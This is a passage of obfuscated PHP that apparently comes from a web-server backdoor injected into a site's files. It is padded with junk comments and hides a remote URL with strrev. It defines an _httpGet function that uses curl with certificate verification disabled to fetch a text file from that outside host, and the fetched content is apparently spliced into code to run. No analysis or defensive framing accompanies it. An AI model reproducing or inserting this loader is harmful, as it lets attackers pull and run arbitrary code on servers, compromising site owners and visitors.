'./*9L*/ _httpGet/*7d*/(strrev('txt.12nam/ek.ro.sptth.knil//:sptth'))/*H3*/); function _httpGet($url = ''){ $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_TIMEOUT, 500); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_URL, $url); $get = curl_exec($curl); curl_close($curl); return $get; }